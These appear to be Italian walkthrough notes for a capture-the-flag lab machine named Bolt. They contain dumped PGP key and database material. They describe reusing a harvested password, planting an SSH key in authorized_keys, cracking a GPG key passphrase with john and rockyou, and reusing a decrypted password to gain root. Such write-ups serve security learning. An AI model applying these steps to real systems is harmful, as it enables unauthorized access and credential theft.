xsBNBGA4G2EBCADbpIGoMv+O5sxsbYX3ZhkuikEiIbDL8JRvLX/r1KlhWlTi fjfUozTU9a0OLuiHUNeEjYIVdcaAR89lVBnYuoneAghZ7eaZuiLz+5gaYczk cpRETcVDVVMZrLlW4zhA9OXfQY/d4/OXaAjsU9w+8ne0A5I0aygN2OPnEKhU RNa6PCvADh22J5vD+/RjPrmpnHcUuj+/qtJrS6PyEhY6jgxmeijYZqGkGeWU +XkmuFNmq6km9pCw+MJGdq0b9yEKOig6/UhGWZCQ7RKU1jzCbFOvcD98YT9a If70XnI0xNMS4iRVzd2D4zliQx9d6BqEqZDfZhYpWo3NbDqsyGGtbyJlABEB AAHNHkVkZGllIEpvaG5zb24gPGVkZGllQGJvbHQuaHRiPsLAjQQQAQgAIAUC YDgbYQYLCQcIAwIEFQgKAgQWAgEAAhkBAhsDAh4BACEJEBwnQaPcO0q9FiEE 30Jrx6Sor1jlDtoOHCdBo9w7Sr35DQf9HZOFYE3yug2TuEJY7q9QfwNrWhfJ HmOwdM1kCKV5XnBic356DF/ViT3+pcWfIbWT8giYIZ/2qYfAd74S+gMKBim8 wBAH0J7WcnUI+py/zXxapGxBF0ufJtqrHmPaKsNaQVCEV3dDzTqlVRi0vfOD Cm6kt3E8f8GPYK9Mh21gPjnhoPE1s23NzmBUiDt6wjZ2dOQ2cVagVnf6PyHM WZLqUm8nQY342t3+AA6SFTw/YpwPPvjtZBBHf95BrSbpCE5Bjar9UyB+14x6 OUcWhkJu7QgySrCwAg2aKIBzsfWovcVTe9Rkpq/ty1tYOklT9kn75D9ttDF4 U8+Qz61kTICf987ATQRgOBthAQgAmlgcw3DqVzEBa5k9djPsUTJWOKVY5uox oBp6X0H9njR9Ufb2XtmxZUUdV/uhtbnM0lSlNkeNNBX4c/Qny88vfkgb66xc oOo4q+fNCEZfCmcS2AwMsUlzaPDQjowp4V+mWSc8JXq4GXOd/mrooibtiEdt vK4pzMdvwGCykFqugyRDLksc1hfDYU+s5R42TNiMdW7OwYAplnOjgExOH8f1 lXVkqbsq5p54TbHe+0SdlfH5pJf4Gfwqj6dQlkSf3DMeEnByxEZX3imeKGrC UmwLN4NHMeUs5EXuLnufut9aTMhbw/tetTtUXTHFk/zc7EhZDR1d3mkDV83c tEUh6BuElwARAQABwsB2BBgBCAAJBQJgOBthAhsMACEJEBwnQaPcO0q9FiEE 30Jrx6Sor1jlDtoOHCdBo9w7Sr3+HQf/Qhrj6znyGkLbj9uUv0S1Q5fFx78z 5qEXRe4rvFC3APYE8T5/AzW7XWRJxRxzgDQB5yBRoGEuL49w4/UNwhGUklb8 IOuffRTHMPZxs8qVToKoEL/CRpiFHgoqQ9dJPJx1u5vWAX0AdOMvcCcPfVjc PyHN73YWejb7Ji82CNtXZ1g9vO7D49rSgLoSNAKghJIkcG+GeAkhoCeU4BjC /NdSM65Kmps6XOpigRottd7WB+sXpd5wyb+UyptwBsF7AISYycPvStDDQESg pmGRRi3bQP6jGo1uP/k9wye/WMD0DrQqxch4lqCDk1n7OFIYlCSBOHU0rE/1 tD0sGGFpQMsI+Q== =+pbw -----END PGP PUBLIC KEY BLOCK-----
bits: 2048
uid: Eddie Johnson
select * from secrets \G id: 643a8b12-c42c-4507-8646-2f8712af88f8 user_id: 4e184ee6-e436-47fb-91c9-dccb57f250bc resource_id: cd0270db-c83f-4f44-b7ac-76609b397746 data: -----BEGIN PGP MESSAGE----- Version: OpenPGP.js v4.10.9 Comment: https://openpgpjs.org wcBMA/ZcqHmj13/kAQgAkS/2GvYLxglAIQpzFCydAPOj6QwdVV5BR17W5psc g/ajGlQbkE6wgmpoV7HuyABUjgrNYwZGN7ak2Pkb+/3LZgtpV/PJCAD030kY pCLSEEzPBiIGQ9VauHpATf8YZnwK1JwO/BQnpJUJV71YOon6PNV71T2zFr3H oAFbR/wPyF6Lpkwy56u3A2A6lbDb3sRl/SVIj6xtXn+fICeHjvYEm2IrE4Px l+DjN5Nf4aqxEheWzmJwcyYqTsZLMtw+rnBlLYOaGRaa8nWmcUlMrLYD218R zyL8zZw0AEo6aOToteDPchiIMqjuExsqjG71CO1ohIIlnlK602+x7/8b7nQp edLA7wF8tR9g8Tpy+ToQOozGKBy/auqOHO66vA1EKJkYSZzMXxnp45XA38+u l0/OwtBNuNHreOIH090dHXx69IsyrYXt9dAbFhvbWr6eP/MIgh5I0RkYwGCt oPeQehKMPkCzyQl6Ren4iKS+F+L207kwqZ+jP8uEn3nauCmm64pcvy/RZJp7 FUlT7Sc0hmZRIRQJ2U9vK2V63Yre0hfAj0f8F50cRR+v+BMLFNJVQ6Ck3Nov 8fG5otsEteRjkc58itOGQ38EsnH3sJ3WuDw8ifeR/+K72r39WiBEiE2WHVey 5nOF6WEnUOz0j0CKoFzQgri9YyK6CZ3519x3amBTgITmKPfgRsMy2OWU/7tY NdLxO3vh2Eht7tqqpzJwW0CkniTLcfrzP++0cHgAKF2tkTQtLO6QOdpzIH5a Iebmi/MVUAw3a9J+qeVvjdtvb2fKCSgEYY4ny992ov5nTKSH9Hi1ny2vrBhs nO9/aqEQ+2tE60QFsa2dbAAn7QKk8VE2B05jBGSLa0H7xQxshwSQYnHaJCE6 TQtOIti4o2sKEAFQnf7RDgpWeugbn/vphihSA984 =P38i -----END PGP MESSAGE----- created: 2021-02-25 21:50:11 modified: 2021-03-06 15:34:36 1 row in set (0.00 sec)
Per ottenere la user flag devo loggare come eddie
utilizzando le
stesse credenziali per accedere al db di passbolt
rT2;jW7<eY8!dX8}pQ8%
Una volta loggati possiamo inserire la nostra chiave rsa con
(locale)
ssh-keygen -t rsa -b 2048 -N ""
(remoto)
cd /home/eddie/.ssh/ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTbhyjs7s605URqnLSDFBbpbZuGXghP8yZFGqie9FaFvGG+OdXNNcHe8pL6ZwRN1mC1l5KCq5og5CyjkV20WyG7O5ULWa85gJgv8WmzBcaBXfq3N75hEw2ndPKQ/8ZL1BUYMb1iOtCNzbPNXLU32S4gsv6ioNJQuZPnSY7kcoLhF8ugN1104b/LCztxWYj8+D4LTZS1blmwbMw2ZHT/j8J81BZam3r3TLHqapNcuAPrTbGnfUQmrK4kxjsxAxIt6UMh6LSOno7hjgsLRtlwhMG1fKcTSfKGJxWiEadCcTBDKM73Skde+ZbfgL8ktJsn+37wncwHn31j5ZxeET7dEzv leo@kali" > authorized_keys
(locale)
ssh -i id_rsa eddie@bolt
eddie@bolt:/var/mail$ cat eddie From clark@bolt.htb Thu Feb 25 14:20:19 2021 Return-Path: <clark@bolt.htb> X-Original-To: eddie@bolt.htb Delivered-To: eddie@bolt.htb Received: by bolt.htb (Postfix, from userid 1001) id DFF264CD; Thu, 25 Feb 2021 14:20:19 -0700 (MST) Subject: Important! To: <eddie@bolt.htb> X-Mailer: mail (GNU Mailutils 3.7) Message-Id: <20210225212019.DFF264CD@bolt.htb> Date: Thu, 25 Feb 2021 14:20:19 -0700 (MST) From: Clark Griswold <clark@bolt.htb> Hey Eddie, The password management server is up and running. Go ahead and download the extension to your browser and get logged in. Be sure to back up your private key because I CANNOT recover it. Your private key is the only way to recover your account. Once you're set up you can start importing your passwords. Please be sure to keep good security in mind - there's a few things I read about in a security whitepaper that are a little concerning... -Clark
La chiave privata trovata nei file di google chrome prima di essere importanta con
gpg --allow-secret-key-import --import private_key.txt
deve essere craccata con john perché presenta una passphrase
. A
tale fine si può eseguire
gpg2john private_key.txt > john_gpg_key john john_gpg_key --wordlist=~/repos/wordlists/rockyou.txt
Alla fine la password è:
merrychristmas
Una volta importanta la chiave privata di Eddie
possiamo decifrare il messaggio che ci ha inviato Clark
leo@kali:~/repos/bolt/pgp$ gpg -d message.pgp gpg: encrypted with 2048-bit RSA key, ID F65CA879A3D77FE4, created 2021-02-25 "Eddie Johnson <eddie@bolt.htb>" {"password":"Z(2rmxsNW(Z?3=p/9s","description":""}gpg: Signature made Sat 06 Mar 2021 04:33:54 PM CET gpg: using RSA key 1C2741A3DC3B4ABD gpg: Good signature from "Eddie Johnson <eddie@bolt.htb>" [unknown] gpg: WARNING: This key is not certified with a trusted signature! gpg: There is no indication that the signature belongs to the owner. Primary key fingerprint: DF42 6BC7 A4A8 AF58 E50E DA0E 1C27 41A3 DC3B 4ABD
Per diventare root basta utilizzare la password trovata prima
Z(2rmxsNW(Z?3=p/9s